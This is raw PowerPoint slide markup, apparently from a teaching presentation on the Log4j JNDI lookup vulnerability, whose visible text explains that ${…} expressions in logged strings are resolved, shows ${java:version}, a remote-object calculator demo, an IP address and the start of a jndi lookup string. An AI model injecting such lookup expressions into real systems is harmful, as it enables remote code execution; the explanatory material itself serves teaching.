          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D1E333-F84E-A23C-8E82-B623758150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3E8AB78A-549F-FA4B-14D1-FBCE427C2C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51B33819-3AF6-6B00-4563-6AD3DF8055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399CAA20-596D-505F-C93E-5E755064E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2EA8ACD4-E44D-3B2D-555B-49D45D6710D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353FBF8-CD48-C431-DB89-7990AE6C4917}"/>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807F2D-51D3-3038-8695-109ED5B06B5B}"/>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B0BE5A29-F975-1AFD-C1B7-DABD2BA9EF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F1BDDF97-068E-C0AA-E978-D97A3A99BC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CADC3128-7DB4-7F7D-695A-3280190288F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04A16216-C1CD-A9DE-B5D7-FC68625757F5}"/>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8405D7-E9DC-ECE2-C50B-6264BE48ADC3}"/>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A04272DB-FB8A-4886-10B2-D879FA48ED4D}"/>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361B57C2-3AF1-C3C6-71A8-571D6E6BF3E7}"/>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BB390AFA-74AA-F98C-98D9-B1A7CFB8383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94CF645F-08DD-94DD-EC81-469916EEE4BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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56E7E5B7-70A6-FA55-E2AE-24251CC2E8F6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E7E5B7-70A6-FA55-E2AE-24251CC2E8F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="18778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3B070CE-46FE-C9B4-B5EC-B5934ACE5E8F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B070CE-46FE-C9B4-B5EC-B5934ACE5E8F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515215"/>
                <a:ext cx="6189120" cy="254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95B24E1F-D531-D898-019E-9FC2956040D0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B24E1F-D531-D898-019E-9FC2956040D0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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4222E822-2354-BCDF-436C-FDB652E3A9B9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4222E822-2354-BCDF-436C-FDB652E3A9B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="454860" y="4621612"/>
                <a:ext cx="95040" cy="417165"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3437FF-C903-F02F-6C2F-2FF6458A0F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4691160"/>
            <a:ext cx="1790700" cy="338040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282821"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2828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2C1C46B-F72B-BA5A-3ACF-DA3405B2583A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19393" y="5529812"/>
            <a:ext cx="12014828" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Java strings that appear as an expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>${…}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> will be resolved before they are logged</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B64F06EC-083A-17EA-6633-AA055AD02673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="4691128"/>
            <a:ext cx="2159566" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java Version 1.7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275388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3B4096-B043-0291-BFC3-BC1A5F11A20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B64819B8-91B7-D965-89E6-3D74345E85C8}"/>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3CAFE4ED-CF40-79E4-316B-CF8CBB58A0C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E63F45E4-6C29-DDB7-5BC5-F0651FBD7B8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6D947236-C00D-1FB8-A24E-41617DF959CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973F9AD0-E689-65D2-4EC0-9F02EA72A8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6EDA3DC3-60D9-6B9E-DFAA-22D43C71E3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8B41B9DA-B08E-75BE-1401-F6EB009E99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27B7F747-165A-B7FE-EE4C-266FB9C2CE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F4A4CB37-671A-06E2-F1B6-10701D7822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E59FBDE-67C1-3505-0DA5-803198763127}"/>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D970E4-8F12-9861-48DD-9FC175994283}"/>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37C8A25F-CEC2-CAB6-D36B-D4979EE114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1DD9D6B2-DF17-E9B7-A57C-CF80DFA60B7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21ECE91C-DE69-75D2-8222-283CB5E6B9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7AF6854A-428E-74D4-7BCA-AE09CE054DEE}"/>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0ED40C-C6CE-A63A-189C-86082B4B66A3}"/>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F3DBE3EA-F018-0071-C19E-51464F6FD47F}"/>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CE4F5BAB-5682-C257-2236-4605057524D7}"/>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F316BB25-1B08-343F-2D91-3B9D7972FEB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0779AF3E-34AA-EE15-C97F-427D355C0ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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23D7A9D8-09C3-6378-789F-A37B9E9BECE1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D7A9D8-09C3-6378-789F-A37B9E9BECE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="18778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ABEEBF0-3C9C-E144-6881-083B8800FB8E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABEEBF0-3C9C-E144-6881-083B8800FB8E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515215"/>
                <a:ext cx="6189120" cy="254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D2D6CFDC-0BCD-C989-54F4-ED98E2103654}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D6CFDC-0BCD-C989-54F4-ED98E2103654}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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38F414C0-AE78-90E4-E0B9-848659899C5E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F414C0-AE78-90E4-E0B9-848659899C5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="454860" y="4621612"/>
                <a:ext cx="95040" cy="417165"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089EE5A1-C0E9-FF0E-D767-5EE7231D0722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4691160"/>
            <a:ext cx="1790700" cy="338040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282821"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2828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5E1CE97-CDCB-1245-6C94-78EBE61A907C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5337897"/>
            <a:ext cx="11506200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We could type a message: </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something_malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and try to place something malicious inside the expression</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E129A380-DC3B-1A4F-DBD1-021E8BABC912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825940" y="4672968"/>
            <a:ext cx="2252540" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${java:version}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFBAF6F-0F03-53C5-D3A3-BC7FCB814A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217621" y="1600200"/>
            <a:ext cx="1659429" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>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238672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0FE4E1-2366-652A-3A25-E93153691C13}"/>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A2DB63BD-B42A-04E3-C0C8-E617D08467FD}"/>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40F77CD6-EFD8-54AF-ADC5-98CFDCE3B689}"/>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3B78A44C-468C-B3C1-A429-905E92B487B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BFBBA116-10F1-7F5E-F44D-62EC5D3EDC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D25A54-2737-91A9-DC6A-9B1E1C8BA5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4B35251B-93FC-3307-81B5-85BB6FFF6C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BB29160D-1CFA-E606-9C43-B9DEBEAE9E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5FF5D90A-8455-8CA0-9474-1057C6B3A4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4022EA8F-4979-DF59-3058-66A378ACD04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C3F966-F911-C4F8-6DBB-6AB749EAB17A}"/>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000230-B618-FDFA-A8EB-6F214BB675C4}"/>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CACEE006-43C8-425F-BE92-D69D6B701D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DA4782B7-E05D-A110-E93F-BF705543423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436D6647-E629-49AE-8853-1C9CE73E9F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6D3326B3-22C1-AE76-99BC-8AB9D3215908}"/>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4D5E2B-6F0C-5325-3F85-C5207E8169BD}"/>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408C120B-5F48-37F5-26B2-EC25BEA3D27C}"/>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FD7ABC88-6D04-4560-495D-9841A9041EB8}"/>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4139CF74-9125-25BE-652D-88B13D8087D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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AC0AE5-7B4B-3F3F-9050-EEFB26CC065A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078480" y="2976584"/>
            <a:ext cx="1045661" cy="103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E4A35DD-A91A-B14C-EA84-3FA3D143FB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3181155"/>
            <a:ext cx="1937373" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Object that Summons a calculator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D70262F-F3E1-3895-113F-34C1868C8C6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9653" y="3122240"/>
            <a:ext cx="747594" cy="74759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5988BD07-FF1E-C744-D2CF-1647FD4D3ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542293" y="4581632"/>
            <a:ext cx="10747213" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Java Naming and Directory Interface (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) is an interface that allows a user to fetch remote Java objects during runtime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224DFE5A-0E25-31FE-CAFF-52F150B4430C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="12261"/>
            <a:ext cx="6119812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12.123.58.9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4B31B4-3B7B-FE59-8622-78294C87F172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="5550809"/>
            <a:ext cx="7172324" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="101418"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="101418"/>
                </a:solidFill>
